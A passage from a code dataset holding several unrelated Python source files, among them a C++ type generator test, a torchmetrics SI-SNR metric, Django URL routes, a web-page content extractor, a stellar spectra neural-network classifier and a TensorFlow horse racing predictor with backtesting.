'tabs_api')\n self.assertEquals('int',\n manager.GetType(\n self.tabs.types['Tab'].properties['id']))\n self.assertEquals('std::string',\n manager.GetType(\n self.tabs.types['Tab'].properties['status']))\n self.assertEquals('bool',\n manager.GetType(\n self.tabs.types['Tab'].properties['selected']))\n\n def testGetTypeArray(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.windows.functions['getAll'].callback.param))\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.permissions.types['Permissions'].properties['origins']))\n\n def testGetTypeLocalRef(self):\n manager = CppTypeGenerator('', self.tabs, 'tabs_api')\n self.assertEquals('Tab',\n manager.GetType(\n self.tabs.functions['get'].callback.param))\n\n def testGetTypeIncludedRef(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n manager.AddNamespace(self.tabs, 'tabs_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.windows.types['Window'].properties['tabs']))\n\n def testGetTypeNotfound(self):\n prop = self.windows.types['Window'].properties['tabs'].item_type\n prop.ref_type = 'Something'\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n self.assertRaises(KeyError, manager.GetType, prop)\n\n def testGetTypeNotimplemented(self):\n prop = self.windows.types['Window'].properties['tabs'].item_type\n prop.type_ = 10\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n self.assertRaises(NotImplementedError, manager.GetType, prop)\n\n def testGetTypeWithPadForGeneric(self):\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n self.assertEquals('std::vector ',\n manager.GetType(\n self.permissions.types['Permissions'].properties['origins'],\n pad_for_generics=True))\n self.assertEquals('bool',\n manager.GetType(\n self.permissions.functions['contains'].callback.param,\n pad_for_generics=True))\n\n def testNamespaceDeclaration(self):\n manager = CppTypeGenerator('extensions', self.permissions,\n 'permissions_api')\n self.assertEquals(\n 'namespace extensions {\\n'\n 'namespace permissions_api {',\n manager.GetCppNamespaceStart().Render())\n\n manager = CppTypeGenerator('extensions::gen::api', self.permissions,\n 'permissions_api')\n self.assertEquals(\n 'namespace extensions {\\n'\n 'namespace gen {\\n'\n 'namespace api {\\n'\n 'namespace permissions_api {',\n manager.GetCppNamespaceStart().Render())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tools/json_schema_compiler/cpp_type_generator_test.py","file_name":"cpp_type_generator_test.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"121341001","text":"from clld.db.models.common import Language, LanguageSource, Source\nfrom clld.web.datatables.base import DataTable, Col, LinkCol, DetailsRowLinkCol\nfrom clld.lib.bibtex import EntryType\n\n\nclass TypeCol(Col):\n def __init__(self, dt, name='btype', *args, **kw):\n kw['sTitle'] = 'BibTeX type'\n kw['choices'] = [(t.value, t.description) for t in EntryType]\n super(TypeCol, self).__init__(dt, name, *args, **kw)\n\n def format(self, item):\n return getattr(item.bibtex_type, 'description', '')\n\n def order(self):\n return Source.bibtex_type\n\n def search(self, qs):\n return Source.bibtex_type == getattr(EntryType, qs)\n\n\nclass Sources(DataTable):\n def __init__(self, req, model, language=None, **kw):\n super(Sources, self).__init__(req, model, **kw)\n if language:\n self.language = language\n elif 'language' in req.params:\n self.language = Language.get(req.params['language'])\n else:\n self.language = None\n\n def base_query(self, query):\n if self.language:\n query = query.join(LanguageSource)\\\n .filter(LanguageSource.language_pk == self.language.pk)\n return query\n\n def col_defs(self):\n return [\n DetailsRowLinkCol(self),\n LinkCol(self, 'name'),\n Col(self, 'description', sTitle='Title'),\n Col(self, 'year'),\n Col(self, 'author'),\n TypeCol(self),\n ]\n\n def get_options(self):\n opts = super(Sources, self).get_options()\n if self.language:\n opts['sAjaxSource'] = self.req.route_url(\n 'sources', _query={'language': self.language.id})\n return opts\n","sub_path":"clld/web/datatables/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399453641","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Any, Callable, Optional\n\nfrom torch import Tensor, tensor\n\nfrom torchmetrics.functional.audio.si_snr import si_snr\nfrom torchmetrics.metric import Metric\n\n\nclass SI_SNR(Metric):\n \"\"\" Scale-invariant signal-to-noise ratio (SI-SNR).\n\n Forward accepts\n\n - ``preds``: ``shape [...,time]``\n - ``target``: ``shape [...,time]``\n\n Args:\n compute_on_step:\n Forward only calls ``update()`` and returns None if this is set to False. default: True\n dist_sync_on_step:\n Synchronize metric state across processes at each ``forward()``\n before returning the value at the step.\n process_group:\n Specify the process group on which synchronization is called. default: None (which selects the entire world)\n dist_sync_fn:\n Callback that performs the allgather operation on the metric state. When `None`, DDP\n will be used to perform the allgather.\n\n Raises:\n TypeError:\n if target and preds have a different shape\n\n Returns:\n average si-snr value\n\n Example:\n >>> import torch\n >>> from torchmetrics import SI_SNR\n >>> target = torch.tensor([3.0, -0.5, 2.0, 7.0])\n >>> preds = torch.tensor([2.5, 0.0, 2.0, 8.0])\n >>> si_snr = SI_SNR()\n >>> si_snr_val = si_snr(preds, target)\n >>> si_snr_val\n tensor(15.0918)\n\n References:\n [1] Y. Luo and N. Mesgarani, \"TaSNet: Time-Domain Audio Separation Network for Real-Time, Single-Channel Speech\n Separation,\" 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), 2018, pp.\n 696-700, doi: 10.1109/ICASSP.2018.8462116.\n \"\"\"\n sum_si_snr: Tensor\n total: Tensor\n\n def __init__(\n self,\n compute_on_step: bool = True,\n dist_sync_on_step: bool = False,\n process_group: Optional[Any] = None,\n dist_sync_fn: Optional[Callable[[Tensor], Tensor]] = None,\n ) -> None:\n super().__init__(\n compute_on_step=compute_on_step,\n dist_sync_on_step=dist_sync_on_step,\n process_group=process_group,\n dist_sync_fn=dist_sync_fn,\n )\n\n self.add_state(\"sum_si_snr\", default=tensor(0.0), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, preds: Tensor, target: Tensor) -> None: # type: ignore\n \"\"\"\n Update state with predictions and targets.\n\n Args:\n preds: Predictions from model\n target: Ground truth values\n \"\"\"\n si_snr_batch = si_snr(preds=preds, target=target)\n\n self.sum_si_snr += si_snr_batch.sum()\n self.total += si_snr_batch.numel()\n\n def compute(self) -> Tensor:\n \"\"\"\n Computes average SI-SNR.\n \"\"\"\n return self.sum_si_snr / self.total\n\n @property\n def is_differentiable(self) -> bool:\n return True\n","sub_path":"torchmetrics/audio/si_snr.py","file_name":"si_snr.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"455284104","text":"from __future__ import unicode_literals\n\nimport os\n\nimport sphinx_rtd_theme\n\nfolder = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(folder, \"..\", \"VERSION\")) as f:\n version = f.read().strip()\n\ntemplates_path = [\"_templates\"]\nsource_suffix = \".rst\"\nmaster_doc = \"index\"\nproject = \"bgen\"\ncopyright = \"2017, Danilo Horta\"\nauthor = \"Danilo Horta\"\nrelease = version\nlanguage = \"en\"\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\", \"conf.py\"]\npygments_style = \"sphinx\"\ntodo_include_todos = False\nprimary_domain = \"c\"\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nhtmlhelp_basename = \"bgendoc\"\n","sub_path":"doc/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"441452212","text":"from django.conf.urls import url\nfrom .views import TweetRUDView, TweetAPIView, UserCreateAPIView\nfrom tweets import views as main_views\n\nurlpatterns = [\n url(r'signup/$', main_views.signup, name='signup'),\n url(r'signup/loginpage/', main_views.login, name='loginpage'),\n url(r'^$',TweetAPIView.as_view(), name='list-tweets'),\n url(r'^(?P\\d+)/$',TweetRUDView.as_view(), name='post-RUD'),\n url(r'register/',UserCreateAPIView.as_view(), name='register-users'),\n]","sub_path":"src/tweets/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"565014974","text":"import re\n\nfrom bs4 import UnicodeDammit\nfrom scrapy import Selector\n\n# 解析网页正文部分的算法实现\n\nRULE_TEXT = './text() | .//p[not(@style) or @style!=\"display: none;\"]//text()[not(ancestor::li) and not(' \\\n 'parent::script) and not(parent::a) and not(parent::style)] | .//div/text()[not(ancestor::li)] '\n\n\nclass ParseContent(object):\n EXCLU_DIVS = ['footer', 'bottom'] # 被排除的div class name\n THRESHOLD = 0.5\n\n @classmethod\n def search_content_xpath(cls, sel, exclu_divs):\n root = sel.xpath('/html/body')\n xpath = cls.recursion('/html/body', root, cls.THRESHOLD, exclu_divs + cls.EXCLU_DIVS)\n print('----------------content path is %s' % xpath)\n return xpath\n\n @classmethod\n def guess_content(cls, div_sel):\n # 验证是不是内容div。。。还没想到好办法\n ct = div_sel.extract()\n if not ct:\n return False\n # add other condition here\n return True\n\n @classmethod\n def recursion(cls, path, root_node, threshold, EXCLU_DIVS):\n divs = root_node.xpath('./div')\n parent_len = cls.get_text_len(root_node)\n max_div_index = 0\n max_len = 0\n if divs.__len__() == 0:\n return path\n for i in range(divs.__len__()):\n div = divs[i]\n class_name = div.xpath('./@class').extract_first()\n if class_name in EXCLU_DIVS:\n continue\n _len = cls.get_text_len(div)\n if _len > max_len:\n max_len = _len\n max_div_index = i\n max_div = divs[max_div_index]\n if max_len / (parent_len+1) < threshold:\n return path\n else:\n div_class = max_div.xpath('./@class').extract_first()\n div_id = max_div.xpath('./@id').extract_first()\n pos = str(max_div_index+1)\n if div_class:\n pos = '@class=\"' + div_class + '\"'\n elif div_id:\n pos = '@id=\"' + div_id + '\"'\n return cls.recursion(path + '/div[' + pos + ']', max_div, threshold, EXCLU_DIVS)\n\n @classmethod\n def get_text_len(cls, label):\n texts = label.xpath(RULE_TEXT).extract()\n text_join = ''.join(texts)\n text_join = re.sub('[^\\u4e00-\\u9fa5]', '', text_join)\n return len(text_join)\n","sub_path":"enterprise_spider/scraper/parse_content.py","file_name":"parse_content.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"20344202","text":"import numpy as np\nimport os.path\nfrom random import random\nfrom matplotlib.pyplot import *\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.structure import *\nfrom pybrain.datasets import SupervisedDataSet\nfrom pybrain.supervised.trainers import BackpropTrainer\n\n# This function is not necessary for the ANN creation, it is merely\n# for diagnostic purposes to periodically check how the ANN is doing\n# by testing it on a selection of random data. It will print out,\n# overall, how well the ANN is doing and show 20 randomly selected\n# spectra and their results after being fed through the ANN.\ndef testANN():\n correct = 0\n printSample = 0\n # Loop through the testing input data (distinct from the\n # training input data) and feed that through the network.\n # Then, if we meet some random condition (which allows us\n # to print out different results each time we test) then\n # print out the ANN results for that testing sample.\n for i in range(-1, -(numbOfFiles-numbOfSamples), -1):\n test = net.activate(inp[i]) # Resultant vector from the ANN\n compare = out[i] # Expected vector for the input spectra\n # If we meet the random condition and haven't already printed out\n # 20 random test results, let's print this particular spectra out.\n if printSample < 20 and random() < 0.05:\n prob = sigmoid(test)/sum(sigmoid(test)) # Sigmoid and normalize our vector\n pos = np.argsort(-prob)[:3] # Sort it and choose the three highest components\n # Now print out information about how this test spectra compares, indicating\n # the three most likely spectra as chosen by the ANN, their percentages, and\n # the correct answer.\n print('Testing Result', -i, '-',\n 'Expected:', slist[np.where(compare == max(compare))[0][0]],\n flush = True, end = '')\n print(' Computed: ',\n slist[pos[0]], ' ',\n str(round(prob[pos[0]]*100,1))[:4], '% ',\n slist[pos[1]], ' ',\n str(round(prob[pos[1]]*100,1))[:4], '% ',\n slist[pos[2]], ' ',\n str(round(prob[pos[2]]*100,1))[:4], '% ',\n sep = '', flush = True)\n printSample += 1\n # Check if the ANN was right for this spectra and increase the correct\n # counter if it was.\n equality = np.all((test == max(test)) == (compare == max(compare)))\n if (equality == True): correct += 1\n # Print out how many of the test spectra it got right at this stage.\n print('Testing Data Results:', correct, '/', numbOfFiles-numbOfSamples, flush = True)\n return correct\n\n# This is run once and when the ANN is finally done being trained. It will apply\n# the ANN to the testing portion of the data and see how many the ANN was able\n# to get correct. This will return the number of correct classifications, the\n# total number that were correct in each spectral class and the total number of\n# spectra in each class.\ndef finalTest():\n correct = 0\n categoryCorrect = [0]*len(slist)\n categoryAll = np.zeros(len(slist))\n for i in range(-1, -(numbOfFiles-numbOfSamples), -1):\n test = net.activate(inp[i])\n compare = out[i]\n categoryAll[compare == 1] += 1\n equality = np.all((test == max(test)) == (compare == max(compare)))\n if (equality == True):\n correct += 1\n prob = sigmoid(test)/sum(sigmoid(test))\n pos = np.argsort(-prob)[0]\n categoryCorrect[pos] += 1\n print('Testing Data Results:', correct, '/', numbOfFiles-numbOfSamples, flush = True)\n return correct, categoryCorrect, categoryAll\n\n# A simple sigmoid function defined for normalizing values\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\nprint('Start...', flush = True)\n\n##\n# DEFINE VARIABLES\n#\n\nPATH = 'PUT_IN_PATH_TO_ANN_DATA'\nFILE = 'ANN_Data.txt'\nslist = ['O', 'B', 'A', 'F', 'G', 'K', 'M', 'L', 'T']\nnumbOfFiles = 8000 # The total number of input spectra to use in creating this ANN\nnumbOfSamples = 6000 # The total number of input spectra to use solely for training\nnumbOfTraining = 100 # The number of times to train the spectra on the training sample\n\ninp = np.array([])\nout = np.array([])\n\n##\n# ANN SETUP\n#\n\n# Define a network with 4500 input nodes, one for each spectrum resolution element,\n# a single hidden layer with 100 nodes, and an output layer with 9 nodes (one for\n# each of the possible spectral types. This represents a probabilistic neural network.\n# This network uses bias nodes and applies a sigmoid function along the way.\nnet = buildNetwork(4500, 100, 9, bias = True, hiddenclass = SigmoidLayer)\nds = SupervisedDataSet(4500, 9)\n\n# Read in the input data file. This is a list where on each line is the flux measured\n# at each wavelength and the last value in the line is that spectrums known spectral type.\n# this is all extracted \nf = 0; c = 0\nwith open(PATH+FILE) as infile:\n for line in infile:\n line = line.strip()\n stype = line[-1]\n line = np.asarray(line[0:-3].split(', ')).astype(np.float)\n line = line[:4500]\n # Only use spectra which are not just noise\n if (np.mean(line) >= 4):\n # Remove any values in the spectra which are obviously wrong by zeroing them\n line[np.abs(line) > 1000] = 0\n if (f < numbOfSamples):\n # Add the current spectra and known spectral type as a 9-element\n # vector. The spectra is scaled down by 1000.\n ds.addSample( line/1000, [(stype == s)*1 for s in slist])\n # Put the spectra and spectral type into our own arrays for later\n inp = np.append(inp, line/1000)\n out = np.append(out, [(stype == s)*1 for s in slist])\n f += 1 # The number of spectra used so far\n c += 1 # The number of spectra read in so far\n if (c % 100 == 0): print(c, f, flush = True)\n if (f >= numbOfFiles):\n break\n\n##\n# ANN TRAINING\n#\n\nprint('Training ANN...', flush = True)\n\nout = out.reshape((f,9))\ninp = inp.reshape((f,4500))\ntrainer = BackpropTrainer(net, ds, learningrate = 0.05)\nerr = []\n# Begin training the requrested number of times. Every tenth\n# training session, test the ANN to see how it is coming along.\nfor i in range(numbOfTraining):\n err.append(trainer.train())\n print('Training Session', i, flush = True)\n if (i % 10 == 0):\n print('Training Error:', err[-1], flush = True)\n testANN()\n\n# Now the training is done, we need to do a final test of\n# the data and analyze how well the ANN did at the end.\ncorrect, categoryCorrect, categoryAll = finalTest()\nprint(correct)\n# Convert categoryCorrect to a percentage\nfor i in range(len(categoryCorrect)):\n print(categoryCorrect[i], categoryAll[i])\n if (categoryAll[i] > 0):\n categoryCorrect[i] /= categoryAll[i] * 100\n else:\n categoryCorrect[i] = np.nan\n\n\n##\n# OUTPUT\n#\n\nfilename = 'output_'\ni = 1\nwhile os.path.isfile(filename + str(i) + '.txt'):\n i += 1\nfilename += str(i)+'.txt'\nprint('Printing to ' + filename, flush = True)\n\n# Print information concerning the total accuracy of the ANN\nfile = open(filename,'w')\nfile.write('Final accuracy: ' + str(correct) + '/' + str(numbOfFiles - numbOfSamples) + '\\n')\nfile.write('Accuracy per category: ')\nfor i in categoryCorrect: file.write(str(i)+', ')\nfile.write('\\n\\n')\n\n# Print out the ANN structure, just for fun\nfor mod in net.modules:\n for conn in net.connections[mod]:\n file.write(mod.name + ' -> ' + conn.outmod.name + ', ' + str(mod.dim) + ' x ' + str(conn.outmod.dim) + '\\n')\n x = np.array(conn.params).reshape(mod.dim,conn.outmod.dim)\n for i in range(mod.dim):\n for j in range(conn.outmod.dim):\n file.write(str(x[i,j]) + ' ')\n file.write('\\n')\n file.write('\\n')\n\nfile.close()\n\n\nprint('Done...', flush = True)\n\n","sub_path":"SpectraClassifyANN.py","file_name":"SpectraClassifyANN.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"315347545","text":"from transformers import BertTokenizer\r\n# bert的tokennizer,主要是将句子转化为id\r\nclass BertTokenHelper(object):\r\n def __init__(self,bert_dir):\r\n self.tokenizer = BertTokenizer.from_pretrained(bert_dir)\r\n special_tokens_dict = {'additional_special_tokens':['[url]','[num]','[word]']}#随机初始化词向量\r\n self.tokenizer.add_special_tokens(special_tokens_dict)\r\n print(\"Load bert vocabulary finished\")\r\n def pad_token_id(self):\r\n return self.tokenizer.pad_token_id\r\n def batch_bert_id(self,instext):\r\n outputs = self.tokenizer.batch_encode_plus(instext,add_special_tokens=True)\r\n input_ids = outputs.data['input_ids']\r\n token_type_ids = outputs.data['token_type_ids']\r\n attention_mask = outputs.data['attention_mask']\r\n return input_ids,token_type_ids,attention_mask","sub_path":"titlecls_project/new_moudle/bertToken.py","file_name":"bertToken.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371490676","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n'''\nHernández Guillén Brenda Itzel, 315291810\nTaller de Herramientas Computacionales\n\n'''\nFibonacci = [1,1]\n\n'''def fibonacci(n):\n a = 1\n b = 1\n i = 2\n while (i<=n):\n f = a + b\n a = b\n b = f\n i = i + 1\n return(a)\n'''\ndef fib(n):\n for i in Fibonacci:\n c = i + Fibonacci[i-1]\n Fibonacci.append(c)\n return(Fibonacci)\n","sub_path":"Clases/Programas/Tarea05/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"526038422","text":"import os\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom utils import cleanse_feature, cleanse_sample, fill_nan, replace_invalid, \\\n process_name, process_class, process_course, process_going, \\\n standardize, slice_naive_data, fc_layer, bilinear_layer, cross_entropy, rmse, normalize\nfrom backtesting import backtest\n\n\nclass RacingPredictor:\n \"\"\"\n Base class for building a horse racing prediction model.\n \"\"\"\n def __init__(self,\n file='',\n batch_size=512,\n num_epochs=None,\n iterations=3e5,\n learning_rate=5e-4):\n \"\"\"\n Initializer of .\n\n :param file: Relative directory of data in csv format.\n \"\"\"\n self.file = os.path.join('./', file)\n self.data = pd.read_csv(self.file)\n\n self.batch_size = batch_size\n self.num_epochs = num_epochs\n self.iterations = int(iterations)\n self.learning_rate = learning_rate\n\n with tf.variable_scope(name_or_scope='init'):\n self.training = tf.placeholder(tf.bool, name='training')\n\n self._input = tf.placeholder(tf.float32, [None, 13], name='input')\n self._win = tf.placeholder(tf.float32, [None, 16], name='win')\n\n def __str__(self):\n return str(self.data.shape)\n\n @staticmethod\n def pre_process(file, persistent=False):\n \"\"\"\n To pre-process the data for further operation(s).\n\n :param file: Path to a csv file.\n :param persistent: A boolean variable indicating whether to make the pre-processed data persistent locally.\n \"\"\"\n # create a duplicate of data\n print('start pre-processing...')\n duplicate = pd.read_csv(file)\n\n # define keys for detecting duplicates\n keys = ['rdate', 'rid', 'hid']\n # define indices of rows to be removed\n indices = []\n # cleanse invalid sample(s)\n print('cleansing invalid sample...')\n duplicate = cleanse_sample(duplicate, keys=keys, indices=indices)\n\n # define rules for dropping feature\n rules = [ # useless features\n 'horsenum', 'rfinishm', 'runpos', 'windist', 'win', 'place', '(rm|p|m|d)\\d+',\n # features containing too many NANs\n 'ratechg', 'horseweightchg', 'besttime', 'age', 'priority', 'lastsix', 'runpos', 'datediff',\n # features which are difficult to process\n 'gear', 'pricemoney'\n ]\n # eliminate useless features\n print('eliminating useless features...')\n duplicate = cleanse_feature(duplicate, rules=rules)\n\n # specify columns to be filled\n columns = ['bardraw', 'finishm', 'exweight', 'horseweight', 'win_t5', 'place_t5']\n # specify corresponding methods\n methods = [('constant', 4), ('constant', 1e5), ('constant', 122.61638888121101),\n ('constant', 1106.368874062333), ('constant', 26.101661368452852), ('constant', 6.14878956518161)]\n # fill nan value(s)\n print('filling nans...')\n duplicate = fill_nan(duplicate, columns=columns, methods=methods)\n\n # specify columns to be replaced\n columns = ['bardraw', 'finishm', 'exweight', 'horseweight']\n # specify schema(s) of replacement\n values = [(0, 14), (0, 1e5), (0, 122.61638888121101), (0, 1106.368874062333)]\n # replace invalid value(s)\n print('replacing invalid values...')\n duplicate = replace_invalid(duplicate, columns=columns, values=values)\n\n # convert 'finishm' into 'velocity'\n print('generating velocity...')\n duplicate['velocity'] = 1e4 * duplicate['distance'] / duplicate['finishm']\n\n # apply target encoding on 'class'\n print('processing class...')\n duplicate = process_class(duplicate)\n # apply target encoding on 'jname' and 'tname'\n print('processing jname and tname...')\n duplicate = process_name(duplicate)\n # apply target encoding on 'venue' and 'course'\n print('processing venue and course...')\n duplicate = process_course(duplicate)\n # apply target encoding on 'track' and 'going'\n print('processing track and going...')\n duplicate = process_going(duplicate)\n\n # conduct local persistence\n if persistent:\n # set index before saving\n duplicate.set_index('index', inplace=True)\n print('saving result...')\n duplicate.to_csv(file.replace('.csv', '_modified.csv'))\n\n return duplicate\n\n def model(self):\n \"\"\"\n To generate a model.\n\n :return: The estimation of race finish time of a single horse in centi second\n \"\"\"\n with tf.variable_scope(name_or_scope='race_predictor'):\n fc_0 = fc_layer(tf.layers.flatten(self._input), 512, training=self.training, name='fc_0')\n\n bi_0 = bilinear_layer(fc_0, 512, training=self.training, name='bi_0')\n bi_1 = bilinear_layer(bi_0, 512, training=self.training, name='bi_1')\n\n win_output = tf.nn.softmax(logits=tf.layers.dense(bi_1, units=16, activation=None, use_bias=False),\n name='win_output')\n\n return win_output\n\n def train(self):\n # pre-process data\n try:\n modify = pd.read_csv(self.file.replace('.csv', '_modified.csv'))\n except FileNotFoundError:\n modify = RacingPredictor.pre_process(self.file, persistent=True)\n\n # drop outdated data\n # modify = modify[:][[val > '2015' for val in modify['rdate']]]\n # perform standardization\n modify = standardize(modify)\n\n # slice data\n x_train, y_train = slice_naive_data(modify)\n\n # define validation set\n validation = None\n x_test, y_test = None, None\n\n # generate model\n win = self.model()\n win_summary = tf.summary.histogram('win_summary', win)\n\n with tf.variable_scope(name_or_scope='optimizer'):\n # loss function\n # total_loss = tf.reduce_mean(tf.reduce_sum(cross_entropy(self._win, win), axis=-1), name='total_loss')\n total_loss = tf.reduce_mean(rmse(self._win, win), name='total_loss')\n loss_summary = tf.summary.scalar('loss_summary', total_loss)\n\n # optimizer\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_ops = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(total_loss)\n\n # configuration\n if not os.path.isdir('save'):\n os.mkdir('save')\n config = tf.ConfigProto()\n\n print('Start training')\n with tf.Session(config=config) as sess:\n # initialization\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\n\n # saver\n optimal = np.inf\n saver = tf.train.Saver(max_to_keep=5)\n\n # store the network graph for tensorboard visualization\n writer = tf.summary.FileWriter('save/network_graph', sess.graph)\n merge_op = tf.summary.merge([win_summary, loss_summary])\n\n # data set\n queue = tf.train.slice_input_producer([x_train, y_train],\n num_epochs=self.num_epochs, shuffle=True)\n x_batch, y_batch = tf.train.batch(queue, batch_size=self.batch_size, num_threads=1,\n allow_smaller_final_batch=False)\n\n # enable coordinator\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess, coord)\n\n try:\n for i in range(self.iterations):\n x, y = sess.run([x_batch, y_batch])\n\n _, loss, sm = sess.run([train_ops, total_loss, merge_op],\n feed_dict={self.training: True, self._input: x, self._win: y})\n\n if i % 100 == 0:\n print('iteration %d: loss = %f' % (i, loss))\n writer.add_summary(sm, i)\n writer.flush()\n if i % 500 == 0:\n if validation is None:\n # read validation set\n validation = pd.read_csv('new_data/test_new.csv')\n validation = cleanse_sample(validation, keys=['rdate', 'rid', 'hid'], indices=[])\n # slice testing data\n x_test, y_test = slice_naive_data(\n standardize(pd.read_csv('new_data/test_new_modified.csv')))\n\n prob, loss = sess.run([win, total_loss],\n feed_dict={self.training: False, self._input: x_test, self._win: y_test})\n\n validation['winprob'] = prob[:, 1]\n validation['2ndprob'] = prob[:, 2]\n validation['3rdprob'] = prob[:, 3]\n\n validation['winprob'] = validation.apply(normalize, axis=1, df=validation, key='winprob')\n validation['2ndprob'] = validation.apply(normalize, axis=1, df=validation, key='2ndprob')\n validation['3rdprob'] = validation.apply(normalize, axis=1, df=validation, key='3rdprob')\n validation['plaprob'] = validation['winprob'] + validation['2ndprob'] + validation['3rdprob']\n\n fixratio = 5e-4\n mthresh = 2.5\n print(\"Getting win stake...\")\n validation['winstake'] = fixratio * (validation['winprob'] * validation['win_t5'] > mthresh)\n print(\"Getting place stake...\")\n validation['plastake'] = fixratio * (validation['plaprob'] * validation['place_t5'] > mthresh)\n\n result = backtest(validation, 'winprob', 'plaprob', 'winstake', 'plastake')\n\n if 0.35 * result['AverageRMSEwin'] + 0.65 * result['AverageRMSEpalce'] < optimal:\n optimal = 0.35 * result['AverageRMSEwin'] + 0.65 * result['AverageRMSEpalce']\n print('save at iteration %d with average loss of %f' % (i, optimal))\n saver.save(sess, 'save/%s/model' %\n (time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))))\n\n except tf.errors.OutOfRangeError:\n print('Done training -- epoch limit reached')\n saver.save(sess, 'save/%s/model' %\n (time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))))\n writer.close()\n finally:\n coord.request_stop()\n\n coord.join(threads)\n\n @staticmethod\n def predict(file):\n data = pd.read_csv(file)\n data = cleanse_sample(data, keys=['rdate', 'rid', 'hid'], indices=[])\n\n # pre-process data\n try:\n modify = pd.read_csv(file.replace('.csv', '_modified.csv'))\n except FileNotFoundError:\n modify = RacingPredictor.pre_process(file, persistent=True)\n\n # perform standardization\n modify = standardize(modify)\n\n # slice data\n x_test, y_test = slice_naive_data(modify)\n\n # get graph\n graph = tf.get_default_graph()\n # session\n with tf.Session(graph=graph) as sess:\n # restore the latest model\n file_list = os.listdir('save/')\n file_list.sort(key=lambda val: val)\n loader = tf.train.import_meta_graph('save/%s/model.meta' % file_list[-2])\n\n # get input tensor\n training_tensor = graph.get_tensor_by_name('init/training:0')\n input_tensor = graph.get_tensor_by_name('init/input:0')\n win_tensor = graph.get_tensor_by_name('init/win:0')\n\n # get output tensor\n output_tensor = graph.get_tensor_by_name('race_predictor/win_output:0')\n\n # get loss tensor\n loss_tensor = graph.get_tensor_by_name('optimizer/total_loss:0')\n\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\n loader.restore(sess, tf.train.latest_checkpoint('save/%s' % file_list[-2]))\n\n prob, loss = sess.run([output_tensor, loss_tensor],\n feed_dict={training_tensor: False, input_tensor: x_test, win_tensor: y_test})\n\n data['winprob'] = prob[:, 1]\n data['2ndprob'] = prob[:, 2]\n data['3rdprob'] = prob[:, 3]\n\n data['winprob'] = data.apply(normalize, axis=1, df=data, key='winprob')\n data['2ndprob'] = data.apply(normalize, axis=1, df=data, key='2ndprob')\n data['3rdprob'] = data.apply(normalize, axis=1, df=data, key='3rdprob')\n data['plaprob'] = data['winprob'] + data['2ndprob'] + data['3rdprob']\n\n fixratio = 1e-4\n mthresh = 2.5\n\n print(\"Getting win stake...\")\n data['winstake'] = fixratio * (data['winprob'] * data['win_t5'] > mthresh)\n print(\"Getting place stake...\")\n data['plastake'] = fixratio * (data['plaprob'] * data['place_t5'] > mthresh)\n\n result = backtest(data, 'winprob', 'plaprob', 'winstake', 'plastake')\n\n return result\n\n\ndef main():\n # read data from disk\n # model = RacingPredictor('../Data/HR200709to201901.csv', iterations=1.5e5, learning_rate=1e-3, batch_size=256)\n\n # train\n # model.train()\n\n # predict\n RacingPredictor.predict('new_data/HR201910W2.csv')\n\n\nif __name__ == '__main__':\n 